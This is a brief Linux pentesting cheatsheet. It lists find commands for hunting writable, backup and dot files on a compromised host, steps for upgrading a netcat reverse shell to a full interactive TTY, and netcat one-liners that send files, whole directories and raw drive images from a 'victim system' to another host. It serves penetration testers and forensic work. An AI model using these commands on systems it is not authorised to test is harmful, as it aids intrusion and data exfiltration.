Linux Privilege Escalation

A cheatsheet containing a collection of useful commands.

Searching

Look for files with the extension .bak:

find / -name "*.bak" -ls 2>&1 | grep -v "Permission denied"

Look for writable files and directories:

find / -writable -ls 2>&1 | grep -v "Permission denied"

Look for dotfiles:

find / -name ".*" -ls 2>&1 | grep -v "Permission denied"

Look for files and directories owned by a specific user while filtering out certain system folders and permission denied output:

find / -regextype posix-extended -regex "/(sys|srv|proc|run)" -prune -o -user <username> -ls 2>&1 | grep -v "Permission denied"

Upgrade Shell

Helpful commands to get you out of raw execution hell via netcat!

Spawn TTY

Choose between python and python3 depending on whats available:

python -c 'import pty;pty.spawn("/bin/bash")'

Tab Completion

Drop out of netcat session by pressing these keys:

Ctrl+Z

In your local commandline type:

stty raw -echo

Foreground the netcat shell by typing the following twice:

fg +

Clear Screen

For the ability to clean up your mess type the following commands.

In the local commandline type:

echo $TERM

You should get some output like screen, dumb, etc..

In the netcat shell type:

export TERM=screen

Reinitialize Terminal

In the netcat shell type:

reset

If you receive the output:

reset: unknown terminal type unknown
Terminal type?

Enter the output from echo $TERM.

History

To review the mess you have made enable command history.

In the netcat shell type:

export SHELL=bash

Enlarge Screen

Make your local terminal the size you like it. Then type:

stty size

Grab the outputted numbers (rows, column) and use them in the following command in the netcat shell:

stty rows 42 cols 188

Transfers With Netcat

We can transfer files quite easily with netcat. This can be very useful both for pentesting and forensic investigations where we would want to avoid writing to the victim system. The good thing about netcat is that the commands are short and sweet.

Basic Send & Receive

On the receiving end run the command:

nc -l -p 1234 > out.file

On the sending end run the command:

nc -w 3 <destination> 1234 < out.file

Compressed Transfers

You can compress larger files for faster transfer if there is access to uncompress and tar.

On the receiving end run the command:

nc -l -p 1234 | uncompress -c | tar xvfp -

On the sending end run the command:

tar cfp - /some/dir | compress -c | nc -w 3 <destination> 1234

Forensic Image Transfer

By using dd with netcat we can transfer the image of a drive on the fly.

On the receiving end run the command:

nc <destination> 1234 | pv -b > hda1.img.gz

On the sending end run the command:

dd if=/dev/hda1 | gzip -9 | nc -l 1234